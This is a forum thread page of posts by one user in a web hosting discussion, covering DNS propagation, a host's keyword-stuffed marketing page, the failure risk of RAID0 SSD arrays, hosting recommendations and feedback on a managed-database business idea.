That's senseless pedantry. When we refer to propagation typically we're not talking about replication among slaves. We're referring to cache expirations from local resolvers and at what point 95% of resolvers will pull the new records. Some upstream resolvers do violate prescribed TTLs, but for the most part propagation = cache, because propagation among slaves is drat near instantaneous.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

Biowarfare posted:

http://bounceweb.com/ajax-hosting.html

oh my god
lol
this horrible keyword stuffing page
that first paragraph under 'What is AJAX?'

Last time BounceWeb was around this block, the thread turned into a shitstorm because their policies forbade ffmpeg... and sure enough the article on ffmpeg hosting is still there :rolleyes:. Oh well, let's see how many suckers that thread can ensnare.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

RAID0 :downs:

These guys either haven't had any serious disasters in the 30 days since rolling it out, or they use 2-disk setups.

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

MrMoo posted:

RAID 0 on SSD is an improvement from mechanical drives, from the underlying storage perspective it is reasonable as there is already error recovery in place, you are only beholden to the controller flaking out which is likely for any other chip in the data path too.

Having no mechanical parts will certainly improve reliability, but electronics fail. I've had everything on PowerEdge servers, from power supplies to LCD bezels, die over 14 years. Intel recorded its AFR at 0.61% for SSDs versus 4.85% for mechanical drives; of course that was 2011 and technology has only improved. Failure, however, remains an ongoing concern. Rolling out machines with 8+ devices in RAID0 greatly amplifies that initial 0.61% risk of losing a unit - and with RAID0, one lost unit is the whole array. Whether SMART catches it and whether they act on it (or have the parts on site to do so) depends upon their competency. Something tells me at that price point competency isn't their strong suit.
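Back of the envelope, assuming independent failures and taking that 2011 0.61% AFR at face value:
code:
1 - (1 - 0.0061)^8 ≈ 0.048    # roughly a 1-in-20 chance per year of losing an 8-drive RAID0, before controller failures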

nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

UGAmazing posted:


- Good speed for my WordPress website
- Working webmail (seems simple enough)
- Working FTP access (hope I'm not asking too much)
- Reliable
- Not lovely customer support

If someone could please point me in a good direction, I would be so, so, so thankful. I don't have time to waste getting something so simple to work properly. :(

Any particular reason you want to gravitate towards a big-box host that reduces your account to ink on a 10-K filing? Those are all very reasonable requests that both DarkLotus (Lithium) and I pride ourselves on providing for clients.


nem
Jan 4, 2003

panel.dev
apnscp: cPanel evolved

nictuku posted:

I'm creating a database-as-a-service infrastructure, so providers can sell managed MongoDB, MySQL, Redis, etc to their customers.
You're competing with PaaS providers now in a highly specialized segment. While not entirely bad, what's your value proposition over other providers who do web servers, apps monitoring, etc as well? (Heroku comes to mind)

quote:

My job is to deploy clustered database and then maintain, backup, monitor, make everything fault-tolerant and auto-scaled. If the database breaks, I'm the one to fix it. Since my cost to run a 1GB RAM server is the same as running a 128GB server, I'd charge a flat fee per server. The fee would be low enough to make this super attractive to hosting providers.
So you're selling the hands-on time, and neither the platform nor the infrastructure to run the database?

quote:

The hosting provider would be responsible for 1) servers, network, etc; 2) customer acquisition; 3) customer support.
Appears so.

quote:

Since these are things that hosting providers are already very good at, I see this a win-win for everyone. Customers get managed services from providers they like; providers get new revenue with little extra operational overhead and; I get my fair share too! Providers can either get new customers, or upsell their existing ones.
So you deploy a database, optimize on generic metrics, and peace out? What happens when a database croaks? If you install it, you're doubly responsible for ensuring it's running even after an abrupt system crash. MySQL is particularly quarrelsome about crashes (before MariaDB 10), offlining tables until they are manually checked...

quote:

I see a bunch of managed MongoDB companies popping up, including one acquired by IBM (compose.io), so there's gotta be a market for this, right?
Maybe. I'd see it being very niche. Most providers that have the capability to deploy enormous databases usually have a dedicated DBA team on site to fix whatever pops up.

I could see this being a complementary service to something like ServerPilot (which I hold my own reservations about, as to its actual efficacy) for wannabe sysadmins who purchase VPSes without an earthly clue as to what they are doing. Throw in a simple monitoring dashboard that works with all of the NoSQL/RDBMS engines out there, attach a $0 price tag, and charge on support (charge hand over fist, might I add!) and you have a product that could be received very warmly by IaaS providers like Linode, DO, and Vultr.

Edit:

For premium version add: easy clustering and replication.

For free version: background optimization like what ktune/tuned does, e.g. mysqltuner.pl

Database loads adjust over time. Having something constantly working in the background, monitoring, making inferences, and then tuning to squeeze maximum performance out would be a killer feature. If you were to make an easy sell, that's the feature that would arouse my interest.

nem fucked around with this message at 05:34 on Aug 19, 2016
